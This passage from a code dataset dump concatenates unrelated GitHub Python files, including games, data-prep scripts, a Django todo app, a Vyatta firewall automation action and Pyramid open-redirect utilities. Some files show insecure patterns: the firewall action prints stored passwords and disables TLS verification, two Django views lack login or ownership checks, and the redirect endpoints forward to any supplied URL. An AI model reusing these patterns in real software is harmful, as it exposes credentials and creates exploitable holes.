testing_set:\n                    if unk_word + '/' in line:\n                        dir = os.path.join(os.path.join(args.data_dir,line))\n                        json_dict = {'file':dir,'text':word}\n                        json.dump(json_dict,ftest)\n                        ftest.write('\\n')\n                        count += 1\n                        if count == 15:\n                            break \n\n        elif word =='silence':\n            shuffle(background_set)\n            for part in background_set[:2800]:\n                dir = os.path.join(os.path.join(args.data_dir,part))\n                json_dict = {'file':dir,'text':word}\n                json.dump(json_dict,ftrain)\n                ftrain.write('\\n')\n            for part in background_set[2800:3200]:\n                dir = os.path.join(os.path.join(args.data_dir,part))\n                json_dict = {'file':dir,'text':word}\n                json.dump(json_dict,fval)\n                fval.write('\\n')\n            for part in background_set[3200:3600]:\n                dir = os.path.join(os.path.join(args.data_dir,part))\n                json_dict={'file':dir,'text': word}\n                json.dump(json_dict,ftest)\n                ftest.write('\\n')\n        \n        else:\n            for part in training_set:\n                if word +'/' in part:\n                    dir = os.path.join(os.path.join(args.data_dir,part))\n                    json_dict = {'file':dir,'text':word}\n                    json.dump(json_dict,ftrain)\n                    ftrain.write('\\n')\n            for part in validation_set:\n                if word +'/' in part:\n                    dir = os.path.join(os.path.join(args.data_dir,part))\n                    json_dict = {'file':dir,'text':word}\n                    json.dump(json_dict,fval)\n                    fval.write('\\n')\n            for part in testing_set:\n                if word +'/' in part:\n                    dir = os.path.join(os.path.join(args.data_dir,part))\n                    json_dict = {'file':dir,'text':word}\n                    json.dump(json_dict,ftest)\n                    ftest.write('\\n')\n    noise_folder = os.path.join(args.data_dir,\"RIRS_NOISES\",'noise')\n    reverb_folder = os.path.join(args.data_dir,\"RIRS_NOISES\",\"reverb\")\n    for part in os.listdir(noise_folder):\n        dir = os.path.join(os.path.join(noise_folder,part))\n        json_dict = {'file':dir}\n        json.dump(json_dict,fnoise)\n        fnoise.write('\\n')\n    for part in os.listdir(reverb_folder):\n        dir = os.path.join(os.path.join(reverb_folder,part))\n        json_dict = {'file':dir}\n        json.dump(json_dict,freverb)\n        freverb.write('\\n') \n    \n    ftrain.close()\n    ftest.close()\n    fval.close()\n    fnoise.close()\n    freverb.close()\n\n    return ftrain,fval,ftest,fnoise,freverb\n    \n\n    \n\n\n\n\n","repo_name":"tuannvhust/keywordspotting_using_deep_learning","sub_path":"scenario/build_json.py","file_name":"build_json.py","file_ext":"py","file_size_in_byte":6341,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"}
{"seq_id":"28670389415","text":"import random as np\n\n# we have a string of characters\n# we turn the string into a list of words with the split() method\n# then we randomly generate an index to draw a random word from our list of words\n# retrieval of the random word\n\nnb_life = 5\n\nwords = \"abuser crottes fleches continental babiole etoile bougie coup coeur malade rova entretien chauvin arnoux\"\n\nwords_list = words.split()\n\nnb_alea = np.randint(0, len(words_list)-1)\n\nsecret_word = words_list[nb_alea]\n\n# dictionary holding the info needed for the game\n\ndictionnaire = {\n\n    \"secret_word\": secret_word,\n    \"guess_word\": \"_\" * len(secret_word),\n    \"life\": nb_life\n\n}\n\nprint(f\"{dictionnaire['guess_word']} | vie= {dictionnaire['life']}\")\n\nwhile True:\n\n    enter_caract = input(\"Enter un caractère > \")\n    if enter_caract in dictionnaire[\"secret_word\"] and enter_caract not in dictionnaire['guess_word']:\n\n        list_of_caract = list(dictionnaire['guess_word'])\n        for index, current_letter in enumerate(dictionnaire[\"secret_word\"]):\n            if current_letter == enter_caract:\n                list_of_caract[index] = enter_caract\n        dictionnaire[\"guess_word\"] = 
\"\".join(list_of_caract)\n\n elif enter_caract not in dictionnaire[\"secret_word\"]:\n dictionnaire[\"life\"] -= 1\n print(f\"{dictionnaire['guess_word']} | vie= {dictionnaire['life']}\")\n\n if \"_\" not in dictionnaire['guess_word']:\n print(\n f\"Felicitation vous avez trouvé le mot: {dictionnaire['secret_word']}\")\n\n break\n elif dictionnaire['life'] < 1:\n print(\n f\"Vous avez perdu le mot est: {dictionnaire['secret_word']}\")\n break\n","repo_name":"RovaEncoder/Python_learning_project","sub_path":"pendu_game.py","file_name":"pendu_game.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"778841967","text":"import os.path\n\nfrom lsst.meas.base import CircularApertureFluxAlgorithm\n\nconfig.measurement.load(os.path.join(os.path.dirname(__file__), \"apertures.py\"))\nconfig.measurement.load(os.path.join(os.path.dirname(__file__), \"kron.py\"))\nconfig.measurement.load(os.path.join(os.path.dirname(__file__), \"convolvedFluxes.py\"))\nconfig.measurement.load(os.path.join(os.path.dirname(__file__), \"gaap.py\"))\nconfig.load(os.path.join(os.path.dirname(__file__), \"cmodel.py\"))\n\nconfig.measurement.slots.gaussianFlux = None\n\nconfig.measurement.plugins['base_PixelFlags'].masksFpCenter.append('BRIGHT_OBJECT')\nconfig.measurement.plugins['base_PixelFlags'].masksFpAnywhere.append('BRIGHT_OBJECT')\n\nconfig.catalogCalculation.plugins.names = [\"base_ClassificationExtendedness\"]\nconfig.measurement.slots.psfFlux = \"base_PsfFlux\"\n\ndef doUndeblended(config, algName, fluxList=None):\n \"\"\"Activate undeblended measurements of algorithm\n\n Parameters\n ----------\n algName : `str`\n Algorithm name.\n fluxList : `list` of `str`, or `None`\n List of flux columns to register for aperture correction. 
If `None`,\n then this will be the `algName` appended with `_instFlux`.\n \"\"\"\n if algName not in config.measurement.plugins:\n return\n if fluxList is None:\n fluxList = [algName + \"_instFlux\"]\n config.measurement.undeblended.names.add(algName)\n config.measurement.undeblended[algName] = config.measurement.plugins[algName]\n for flux in fluxList:\n config.applyApCorr.proxies[\"undeblended_\" + flux] = flux\n\n\ndoUndeblended(config, \"base_PsfFlux\")\ndoUndeblended(config, \"ext_photometryKron_KronFlux\")\ndoUndeblended(config, \"base_CircularApertureFlux\", []) # No aperture correction for circular apertures\ndoUndeblended(config, \"ext_convolved_ConvolvedFlux\",\n config.measurement.plugins[\"ext_convolved_ConvolvedFlux\"].getAllResultNames())\ndoUndeblended(config, \"ext_gaap_GaapFlux\",\n config.measurement.plugins[\"ext_gaap_GaapFlux\"].getAllGaapResultNames())\n# Disable registration for apCorr of undeblended convolved; apCorr will be done through the deblended proxy\nconfig.measurement.undeblended[\"ext_convolved_ConvolvedFlux\"].registerForApCorr = False\nconfig.measurement.undeblended[\"ext_gaap_GaapFlux\"].registerForApCorr = False\n","repo_name":"lsst/obs_subaru","sub_path":"config/forcedPhotCoadd.py","file_name":"forcedPhotCoadd.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"40451416665","text":"def partition(arr,l,r):\n p=arr[l]\n i,j=l,r\n while i<=j:\n while i<=j and arr[i]<=p: i+=1\n while i<=j and arr[j]>=p: j-=1\n if i<=j:\n arr[i],arr[j]=arr[j],arr[i]\n arr[l],arr[j]=arr[j],arr[l]\n return j\ndef quickSort(arr,l,r):\n if l x1:\n x1 += 1\n elif x2 < x1:\n x1 -= 1\n\n if y2 > y1:\n y1 += 1\n elif y2 < y1:\n y1 -= 1\n\n grid[y1][x1] += 1\n\n\nif __name__ == '__main__':\n testing = False\n\n # Reads lines into a list input\n print('Reading hydrothermal data...')\n file = 'testinput.txt' if testing else 'input.txt'\n with open(file) as f:\n input = []\n for i in f.readlines():\n coords = []\n for n in i.strip().split(' -> '):\n coords.append(list(map(int, n.split(','))))\n input.append(coords)\n\n # Creates array from input\n input = np.array(input)\n grid = np.zeros((input.max() + 1, input.max() + 1), np.int16)\n\n # Part 1 solution\n for i in input:\n addLines(grid, i, True)\n print(f'Warning: Hydrothermal temperatures are dangerously high at {(grid >= 2).sum()} points.',\n 'It is strongly recommended that you turn back now.')\n\n # Part 2 solution\n grid = np.zeros((input.max() + 1, input.max() + 1), np.int16)\n for i in input:\n addLines(grid, i, False)\n print('Warning: Deeper analysis has reveal that hydrothermal temperatures are dangerously high at',\n f'{(grid >= 2).sum()} points. 
Are you sure whatever you are doing is worth it?')\n","repo_name":"ColonialDagger/AoC2021","sub_path":"Day 5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17800454499","text":"from datetime import date\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom home.forms import CreateNewIssue\nfrom home.models import Issue\nfrom .models import Issue\nimport json\nfrom django.core import serializers\nfrom django.forms.models import model_to_dict\nfrom django.core.serializers.json import DjangoJSONEncoder\n\n\n# Create your views here.\n\n\n@login_required(login_url='login')\ndef home(request):\n issues = Issue.objects.filter(user=request.user)\n context = {'issues': issues}\n return render(request, 'home/home.html', context)\n\n\n@login_required(login_url='login')\ndef get_issue_by_id(request, issue_id):\n _issue = model_to_dict(Issue.objects.get(pk=issue_id))\n _issue[\"create_date\"] = str(_issue[\"create_date\"])\n _issue[\"finish_date\"] = _issue[\"finish_date\"] if _issue[\"finish_date\"] is None else str(_issue[\"finish_date\"])\n _issue[\"start_date\"] = _issue[\"start_date\"] if _issue[\"start_date\"] is None else str(_issue[\"start_date\"])\n return HttpResponse(json.dumps(_issue))\n\n\n@login_required(login_url='login')\ndef post_new_issue(request):\n if request.method == \"POST\":\n data = json.loads(request.body.decode('utf-8'))\n data[\"create_date\"] = date.today()\n data[\"user_id\"] = request.user.id\n _data = Issue()\n _data.__dict__.update(data)\n _data.save()\n result = {\"status_code\": 1, \"status\": \"success\"}\n return HttpResponse(json.dumps(result))\n\n\n@login_required(login_url='login')\ndef new_issue(request):\n if request.method == \"POST\":\n form = CreateNewIssue(request.POST)\n if form.is_valid():\n t = form.save(commit=False)\n t.user = request.user\n t.create_date = date.today()\n t.save()\n return redirect('home')\n else:\n form = CreateNewIssue()\n return render(request, 'home/new_issue.html', {\"form\": form})\n\n\n@login_required(login_url='login')\ndef issue(request, issue_id):\n showed_issue = Issue.objects.get(pk=issue_id)\n return render(request, 'home/issue.html', {\"issue\": showed_issue})\n\n\ndef issue_edit(request, issue_id):\n issue_by_id = Issue.objects.get(pk=issue_id)\n if request.method == \"POST\":\n form = CreateNewIssue(request.POST, instance=issue_by_id)\n if form.is_valid():\n t = form.save(commit=False)\n t.user = request.user\n t.create_date = date.today()\n t.save()\n return redirect('home')\n else:\n showed_issue = Issue.objects.get(pk=issue_id)\n form = CreateNewIssue(instance=showed_issue)\n return render(request, 'home/new_issue.html', {\"form\": form})\n","repo_name":"emincankirmizi/django-todo-jira","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7680114910","text":"import copy\nfrom math import gcd\n\ndata = [x[1:-2] for x in open(\"input.txt\").readlines()]\n\norig_universe = []\n\n\ndef _compare_velocity(a, b):\n\treturn 0 if a == b else ((a - b) // abs(a - b))\n\n\nclass Planet:\n\tdef __init__(self, position, velocity=(0, 0, 0,)):\n\t\tself.position = position\n\t\tself.velocity = velocity\n\n\tdef update_velocity(self, 
other):\n\t\tself.velocity = tuple(self.velocity[i] - _compare_velocity(self.position[i], other.position[i]) for i in range(3))\n\n\tdef apply_velocity(self):\n\t\tself.position = tuple(x + y for x, y in zip(self.position, self.velocity))\n\n\tdef get_potential_energy(self):\n\t\treturn sum(abs(x) for x in self.position)\n\n\tdef get_kinetic_enerty(self):\n\t\treturn sum(abs(x) for x in self.velocity)\n\n\tdef get_total_energy(self):\n\t\treturn self.get_potential_energy() * self.get_kinetic_enerty()\n\n\ndef populate_planets():\n\tfor d in data:\n\t\tpositions = d.split(',')\n\t\torig_universe.append(Planet((int(positions[0].split('=')[1]), int(positions[1].split('=')[1]), int(positions[2].split('=')[1]),)))\n\n\ndef step_forward(planets):\n\tfor i, planet in enumerate(planets):\n\t\tfor j in range(i + 1, len(planets)):\n\t\t\tplanet.update_velocity(planets[j])\n\t\t\tplanets[j].update_velocity(planet)\n\t\tplanet.apply_velocity()\n\n\ndef part_one():\n\tplanets = copy.deepcopy(orig_universe)\n\tstep = 0\n\twhile step < 1000:\n\t\tstep_forward(planets)\n\t\tstep += 1\n\treturn sum(int(planet.get_total_energy()) for planet in planets)\n\n\ndef lcm(a, b):\n\treturn a * b // gcd(a, b)\n\n\ndef get_cycle_length(plane_idx):\n\tplanets = copy.deepcopy(orig_universe)\n\tcycle_elems = []\n\ti = 0\n\tstart_cycle_idx = 0\n\ttest_idx = 0\n\tstarted_cycle_test = False\n\twhile True:\n\t\tplane = str([planet.position[plane_idx] for planet in planets])\n\t\tif started_cycle_test:\n\t\t\ttest_idx += 1\n\t\t\tif cycle_elems[test_idx] != plane:\n\t\t\t\ttest_idx = 0\n\t\t\t\tstarted_cycle_test = False\n\t\t\t\tif cycle_elems[0] == plane:\n\t\t\t\t\tstarted_cycle_test = True\n\t\t\t\t\tstart_cycle_idx = i\n\t\t\tif test_idx == start_cycle_idx:\n\t\t\t\treturn start_cycle_idx\n\t\telse:\n\t\t\tif len(cycle_elems) > 0 and cycle_elems[0] == plane:\n\t\t\t\tstarted_cycle_test = True\n\t\t\t\tstart_cycle_idx = i\n\t\tcycle_elems.append(plane)\n\t\tstep_forward(planets)\n\t\ti += 1\n\n\ndef part_two():\n\tcycles = set()\n\tfor i in range(3):\n\t\tcycles.add(get_cycle_length(i))\n\tcycles = list(cycles)\n\treturn lcm(lcm(cycles[0], cycles[1]), cycles[2])\n\n\nif __name__ == '__main__':\n\tpopulate_planets()\n\tprint(part_one()) # 9958\n\tprint(part_two()) # 318382803780324\n","repo_name":"andrewpickett/advent-of-code","sub_path":"2019/python/day12/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"979480417","text":"###############################################################################\n# All plump stuff for tasks.\n###############################################################################\nimport os\nimport config\nfrom plump import list_raw, list_jpg, filename_get_name, get_path, TASK, DIR_02\n\n\ndef get_actual():\n \"\"\"\n Returns dictionary with keys 'task' (foldername/taskname),\n 'name' (task name), 'folder' (folder name), 'path' (absolute path)\n of the actual task or None, if not set.\n \"\"\"\n try:\n settings = config.read_pickle()\n item = settings[TASK]\n\n if item is None or item == 'None':\n return None\n else:\n (folder, name) = item.rsplit('/', 1)\n path = get_task_path('{}'.format(item))\n task = {'task': item, 'name': name, 'folder': folder, 'path': path}\n return task\n except:\n print(\"get_actual() {}\".format(str('Exception occurred')))\n return None\n\n\ndef get_task_path(_task):\n \"\"\"\n Returns String with the absolute path of the task, or 
None\n    if no actual task is set.\n    Example:\n        get_task_path('w/20160101')\n        return '/home/chris/fow/02_Progress/w/20160101'\n    \"\"\"\n    return get_path(DIR_02 + '/' + _task)\n\n\ndef check_actual():\n    \"\"\"\n    Analyse and write error message if actual path is not set or invalid.\n    Returns True, if actual task is set and path exists. No print output.\n    Returns False and writes an error message, if task not set or path\n    does not exist.\n    \"\"\"\n    if get_actual() is None:\n        print('No actual task. Use \"task --create \" to create one.')\n        return False\n\n    if not os.path.exists(get_task_path(get_actual()['task'])):\n        print('Actual task points to invalid directory \"'\n              + get_actual()['task'] +\n              '\". Please set correct task with task -a .')\n        return False\n\n    return True\n\n\ndef move_corresponding_raws(jpg_dir, src_dir, dest_dir, dry_run):\n    \"\"\"\n    Moves all corresponding raws from source directory to destination directory.\n    jpg_dir is the /jpg directory with corresponding jpg files.\n    src_dir is the /raw directory with raws to move.\n    dest_dir is the target directory.\n    \"\"\"\n    # print('jpg=' + jpg_dir)\n    # print('src=' + src_dir)\n    # print('dst=' + dest_dir)\n\n    jpgs = list_jpg(jpg_dir)\n    # print(str(jpgs))\n\n    raws = list_raw(src_dir)\n    # print(str(raws))\n    files = [r for r in raws for j in jpgs\n             if filename_get_name(r) == filename_get_name(j)]\n\n    if len(files) == 0:\n        print('No RAWs to move.')\n        return\n\n    if dry_run:\n        print('raw files to move (may already exist):')\n        for each_file in files:\n            print(str(each_file))\n    else:\n        for each_file in files:\n            os.rename(src_dir + '/' + each_file, dest_dir + '/' + each_file)\n\n\ndef get_task_triple(offset):\n    \"\"\"\n    Returns dict with three tasks active, previous, next.\n    Offset: offset relative to the actual task. For instance, offset=-1 would return\n    the tasks -2, -1 and 0 relative to the active task.\n    Actual: the active task or, if offset != 0, the relative task. 
If\n there is no task active, the first task will be returned.\n If there is just one task, this one will be returned\n Returns None, if there are no tasks.\n next and previous are set to None, if there is only one task\n The task list is seen as a ring list, the task 'last+1' will be set to\n task 0 and, on the other hand, the task -1 will be set to last task.\n\n Example:\n return dict=(\n a_task=dict(subdir='family',task='holidays',active=true),\n p_task=dict(subdir='family',task='birthday',active=False),\n n_task=dict(subdir='weekly',task='20160101',active=False))\n\n \"\"\"\n tasks = []\n\n dir02 = [f.name for f in os.scandir(get_path(DIR_02)) if f.is_dir()]\n # dir02 = os.listdir(get_path(DIR_02))\n\n dir02.sort()\n active = get_actual()\n\n for each_folder in dir02:\n task_dirs = os.listdir(get_path(DIR_02) + '/' + each_folder)\n task_dirs.sort()\n for each_task in task_dirs:\n if active['folder'] == each_folder and \\\n active['name'] == each_task:\n is_active = True\n else:\n is_active = False\n\n tasks.append(dict(subdir=each_folder, task=each_task,\n active=is_active))\n\n # print('get_next_task() ' + str(tasks))\n\n # Just one or none task\n if len(tasks) == 0:\n return None\n elif len(tasks) == 1:\n return dict(a_task=tasks[0], n_task=None, p_task=None)\n\n # Find active item\n max_i = len(tasks) - 1\n\n active_i = -1\n for i in range(0, max_i + 1):\n # print('i={0}'.format(i))\n if tasks[i]['active']:\n active_i = i\n break\n # print('active_i={0}, offset={1}'.format(active_i, offset))\n\n i_active = active_i + offset\n i1 = i_active - 1\n i2 = i_active + 1\n # if(backwards):\n # i_active = active_i - 1\n # i1 = active_i - 2\n # i2 = active_i\n # else:\n # i_active = active_i + 1\n # i1 = active_i\n # i2 = active_i + 2\n # print('get_next_task() p={0} a={1} n={2}'.format(i1, i_active, i2))\n\n # Handle out of ranges\n if i_active < 0:\n i_active = max_i + i_active + 1\n elif i_active >= max_i:\n i_active = i_active - max_i - 1\n if i1 < 0:\n i1 = max_i + i1 + 1\n elif i1 >= max_i:\n i1 = i1 - max_i - 1\n if i2 < 0:\n i2 = max_i - i2 + 1\n elif i2 >= max_i:\n i2 = i2 - max_i - 1\n\n # print('get_next_task() p={0} a={1} n={2}'.format(i1, i_active, i2))\n return dict(a_task=tasks[i_active], p_task=tasks[i1],\n n_task=tasks[i2])","repo_name":"chs8691/fow","sub_path":"dist/debian/usr/lib/fow/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":5789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2870940641","text":"import os\r\nimport re\r\nimport tkinter as tk\r\nimport tkinter.messagebox\r\nimport sys\r\n\r\nroot = tk.Tk()\r\nroot.withdraw()\r\nregexx = r\"SpawnDino (\\\".*\\\")\"\r\nResult = {}\r\nres = \"\"\r\ntick = 0\r\n\r\n\r\nif os.path.isfile('./Output.txt'):\r\n with open('./Output.txt', 'r', encoding='utf-8') as f:\r\n readfiles = f.read()\r\nelse:\r\n tkinter.messagebox.showerror(\"Error!\",\"Output.txt does not exist in this folder, make sure you run the ARK Code Generator first!\")\r\n sys.exit(0)\r\n \r\n\r\nResult[0] = re.findall(regexx, readfiles)\r\n\r\nfor stuff in Result[0]:\r\n if tick == 1000:\r\n with open('./NewOutput.txt', 'w', encoding='utf-8') as ff:\r\n ff.write(res)\r\n tkinter.messagebox.showinfo(\"Limit of 1000 Reached!\",\"Your Blueprint paths is in the \\\"NewOutput.txt\\\" file.\")\r\n sys.exit()\r\n res += ('{}'.format(stuff+\";\"))\r\n tick += 1\r\n\r\nif res == \"\":\r\n tkinter.messagebox.showerror(\"Error!\",\"Output.txt does not contain any dinosaurs!\")\r\n 
sys.exit()\r\n\r\nwith open('./NewOutput.txt', 'w', encoding='utf-8') as ff:\r\n    ff.write(res)\r\n\r\ntkinter.messagebox.showinfo(\"Success!\",\"Your Blueprint paths is in the \\\"NewOutput.txt\\\" file.\\nTotal Dinos: {}\".format(tick))\r\n","repo_name":"Lust-Ware/SimpleSpawnersBlueprintMaker","sub_path":"SimpleSpawners BluePrint Maker.py","file_name":"SimpleSpawners BluePrint Maker.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"30587718619","text":"import requests\nimport warnings\nimport json\nfrom st2client.client import Client\nfrom st2common.runners.base_action import Action\n\n\nclass InternalCfgFwRule(Action):\n    def run(self, deviceIP, cmd_path, fw_instance_name,\n            rule_number, rule_content):\n\n        cmd_path = cmd_path[:26]\n        rule_number = str(rule_number)\n\n        # Fetching device credentials based on keys derived from deviceIP\n        #################################################################\n        user_key_name = deviceIP + \"_user\"\n        pswd_key_name = deviceIP + \"_pswd\"\n        print(\"\\n\")\n        print(\">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\n        print(\"Looking for credentials in KV store\")\n        client = Client()\n        try:\n            user = (client.keys.get_by_name(user_key_name)).value\n            pswd = (client.keys.get_by_name(pswd_key_name)).value\n            print(\"    Obtained from KV store: user = \" + user)\n            print(\"    Obtained from KV store: pswd = \" + pswd)\n        except Exception:\n            return (False, \"No credentials for : \" + deviceIP)\n\n        # Preparing the URL request(s)\n        #################################################################\n        h = {\n            \"accept\": \"application/json\",\n            \"content-length\": \"0\"\n        }\n\n        url_0 = \"https://\" + deviceIP + \"/\" + cmd_path\n        url_1 = \"/set/security/firewall/name/\" + fw_instance_name\n        url_2 = \"/rule/\" + rule_number\n        url_base = url_0 + url_1 + url_2\n\n        url_list = list()\n\n        # Fetching content of the 'rule_content' object and building the URL call list\n        #################################################################\n        if 'action' in rule_content:\n            action = rule_content['action']\n            url = url_base + \"/action/\" + action\n            url_list.append(url)\n\n        if 'state' in rule_content:\n            state = rule_content['state']\n            url = url_base + \"/state/\" + state\n            url_list.append(url)\n\n        if 'src_addr' in rule_content:\n            src_addr = rule_content['src_addr'].replace(\"/\", \"%2F\")\n            url = url_base + \"/source/address/\" + src_addr\n            url_list.append(url)\n\n        if 'src_port' in rule_content:\n            try:\n                protocol = rule_content['protocol']\n            except Exception:\n                print(\"protocol required in filter_list parameter\")\n\n            url = url_base + \"/protocol/\" + protocol\n            url_list.append(url)\n            src_port = rule_content['src_port']\n            url = url_base + \"/source/port/\" + src_port\n            url_list.append(url)\n\n        if 'dst_addr' in rule_content:\n            dst_addr = rule_content['dst_addr'].replace(\"/\", \"%2F\")\n            url = url_base + \"/destination/address/\" + dst_addr\n            url_list.append(url)\n\n        if 'dst_port' in rule_content:\n            try:\n                protocol = rule_content['protocol']\n            except Exception:\n                print(\"protocol required in filter_list parameter\")\n\n            url = url_base + \"/protocol/\" + protocol\n            url_list.append(url)\n            dst_port = rule_content['dst_port']\n            url = url_base + \"/destination/port/\" + dst_port\n            url_list.append(url)\n\n        # Sending the URL call(s)\n        #################################################################\n        print(\"Sending REST call(s):\")\n        for u in url_list:\n            with warnings.catch_warnings():\n                
warnings.simplefilter(\"ignore\")\n print(\" PUT \" + u)\n r = requests.put(u, auth=(user, pswd), headers=h, verify=False)\n r_code = str(r.status_code)\n print(\" Response code: \" + r_code)\n cmd_response_code = int(r.status_code)\n if cmd_response_code != 200:\n return (False, cmd_response_code)\n else:\n try:\n data = json.loads(r.text)\n print(\" Response body: \")\n print(json.dumps(data, sort_keys=True, indent=4))\n except Exception:\n print(\" Response body: empty\")\n print(\">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\n","repo_name":"StackStorm-Exchange/stackstorm-vyatta","sub_path":"actions/0_cfg_fw_rule.py","file_name":"0_cfg_fw_rule.py","file_ext":"py","file_size_in_byte":4331,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"70570062132","text":"from flask import Flask\n\nfrom app.configs import env_configs, database, migration\nfrom app.routes import category_blueprint, task_blueprint, get_blueprint\n\n\ndef create_app():\n\n app = Flask(__name__)\n env_configs.init_app(app)\n database.init_app(app)\n migration.init_app(app)\n\n app.register_blueprint(category_blueprint.bp)\n app.register_blueprint(task_blueprint.bp)\n app.register_blueprint(get_blueprint.bp)\n\n return app\n","repo_name":"Charles-Pinheiro/matriz-eisenhower","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23377633781","text":"from pyramid.response import Response\nfrom pyramid.view import view_config\n\n\ndef _check_missing_params(request, required_params):\n missing_params = [param for param in required_params if param not in request.params]\n\n if missing_params:\n message = \"\"\n\n for param in missing_params:\n message += \"Missing param: {}\\n\".format(param)\n\n resp = Response(message)\n resp.headers['Content-Type'] = 'text/plain'\n return resp\n return None\n\n\n@view_config(route_name='utils_redirect_home', renderer='prettyjson')\ndef redirect_home(request):\n return {'routes': ['302', '307', 'get_to_post']}\n\n\n@ view_config(route_name='redirect_302')\ndef redirect_302(request):\n missing_params = _check_missing_params(request, ['url'])\n\n if missing_params:\n return missing_params\n\n url = request.params['url']\n resp = Response(status=302)\n resp.headers['Location'] = url\n return resp\n\n\n@view_config(route_name='redirect_307')\ndef redirect_307(request):\n missing_params = _check_missing_params(request, ['url'])\n\n if missing_params:\n return missing_params\n\n url = request.params['url']\n resp = Response(status=307)\n resp.headers['Location'] = url\n return resp\n\n\n@view_config(route_name='redirect_get_to_post', request_method='GET')\ndef redirect_get_to_post(request):\n missing_params = _check_missing_params(request, ['url'])\n\n if missing_params:\n return missing_params\n\n action = request.current_route_url()\n resp = Response(r'''\n \n
\n \n '''.format(action), status=200)\n resp.headers['Content-Type'] = 'text/html'\n return resp\n\n\n@view_config(route_name='redirect_get_to_post', request_method='POST')\ndef redirect_get_to_post_via_post(request):\n missing_params = _check_missing_params(request, ['url'])\n\n if missing_params:\n return missing_params\n\n url = request.params['url']\n\n resp = Response(status=307)\n resp.headers['Location'] = url\n return resp","repo_name":"d0nutptr/d0nut.sh","sub_path":"d0nut_sh/utils_redirect.py","file_name":"utils_redirect.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17651559811","text":"import os\nimport pandas as pd\nimport re\n\ndef mergeDust(filePath):\n print(filePath)\n extension = os.path.splitext(filePath)[1]\n if extension == '.csv':\n data = pd.read_csv(filePath)\n else :\n data = pd.read_excel(filePath)\n\n data.fillna(0, inplace=True)\n out = {}\n for idx in range(len(data)):\n day = data.iloc[idx][0]\n dust = data.iloc[idx][6]\n if day in out:\n out[day][0] += dust\n out[day][1] += 1\n else:\n out[day] = [dust,1]\n\n for key, value in out.items():\n out[key] = round(value[0]/value[1], 2)\n \n return out\ndef init():\n Dir = './대기오염도'\n fileList = os.listdir(Dir)\n for File in sorted(fileList):\n out = {}\n filePath = '/'.join([Dir, File])\n out.update(mergeDust(filePath))\n year = re.sub('[^0-9]', '',File).strip()\n out_file = pd.DataFrame(list(out.items()), columns=['day', 'dust'])\n out_file.to_csv('./전처리/일별/대기오염도/%s.csv' %year, index=False)\n\nif __name__ == '__main__':\n print('main')\n init()","repo_name":"Hyun-mo/2021-Data-Analysis","sub_path":"merge_dust.py","file_name":"merge_dust.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13649364369","text":"\"\"\"Work with ImageMagick.\"\"\"\nimport os\nimport subprocess\n\n\ndef convert_pdf_to_images(pdf_file_path: str, images_folder_path: str, temp_folder_path: str):\n \"\"\"Convert a PDF file to high-resolution images using ImageMagick.\"\"\"\n env = os.environ.copy()\n env['MAGICK_TEMPORARY_PATH'] = temp_folder_path\n try:\n subprocess.run(\n [\n \"convert\", \"-density\", \"300\", pdf_file_path,\n \"-quality\", \"100\",\n os.path.join(images_folder_path, \"output-%03d.tif\")\n ],\n check=True,\n env=env\n )\n except subprocess.CalledProcessError as err_msg:\n print('Error:', err_msg.stderr)\n\n\ndef create_pdf_from_images(images_folder_path: str, output_pdf_path: str):\n \"\"\"Create a PDF file from high-resolution images using ImageMagick's convert command.\"\"\"\n try:\n subprocess.run(\n [\n \"convert\", os.path.join(images_folder_path, \"*.tif\"),\n output_pdf_path\n ],\n check=True\n )\n print(\"PDF file created successfully.\")\n except subprocess.CalledProcessError as err:\n print('Error:', err.stderr)\n","repo_name":"dph0899/my-utils","sub_path":"pdf/image_magick.py","file_name":"image_magick.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5428444607","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/4/3 下午3:20\n# @Author : ZS\n# @Email : @163.com\n# @File : 异常处理.py\n# @Software: PyCharm\n\n'''\nwhile True:\n\n try:\n\n number = input(\"输入序列号\")\n i = int(number)\n pass\n\n except IndexError as e:\n\n pass\n\n except ValueError as e:\n\n pass\n\n except Exception as e:\n\n print(e)\n i = 
